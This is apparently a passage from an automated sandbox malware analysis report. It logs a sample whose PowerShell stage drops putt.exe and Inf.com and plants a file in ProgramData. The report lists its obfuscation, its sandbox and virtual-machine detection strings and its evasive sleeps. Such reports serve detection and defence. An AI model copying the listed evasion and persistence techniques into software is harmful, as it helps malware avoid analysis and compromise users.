Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: cryptosetup.pdbGCTL source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr
Source:	Binary string: cryptosetup.pdb source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 5_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_00406328

PE file contains an invalid checksum

Source: putt.exe.0.dr	Static PE information: real checksum: 0x13b848 should be: 0x144e84
Source: lem[1].exe.0.dr	Static PE information: real checksum: 0x13b848 should be: 0x144e84

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AE7D2A5 pushad ; iretd	0_2_00007FFD9AE7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF97964 push ebx; retf	0_2_00007FFD9AF9796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF900BD pushad ; iretd	0_2_00007FFD9AF900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF9291D push E95DB9EFh; ret	0_2_00007FFD9AF92939
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9AF90953 push E95790D0h; ret	0_2_00007FFD9AF909C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B06438B push esi; iretd	0_2_00007FFD9B0643A7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B063DC1 pushad ; retf	0_2_00007FFD9B063DE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B063DE2 pushad ; retf	0_2_00007FFD9B063DE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B0677E1 push cs; retf	0_2_00007FFD9B0677E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008C0DE6 push ecx; ret	18_2_008C0DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Jump to dropped file

Drops PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lem[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File created: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\putt.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

File created: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG

Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

File created: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009326DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		18_2_009326DD
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008BFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		18_2_008BFC7C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION

Contains functionality to detect virtual machines (SLDT)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_00007FFD9B061009 sldt word ptr [eax]

0_2_00007FFD9B061009

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5196			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4654			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Dropped PE file which has not been started: C:\ProgramData\4O8YUSJEUA1N\Q9R1NG

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

API coverage: 3.7 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5004	Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\findstr.exe

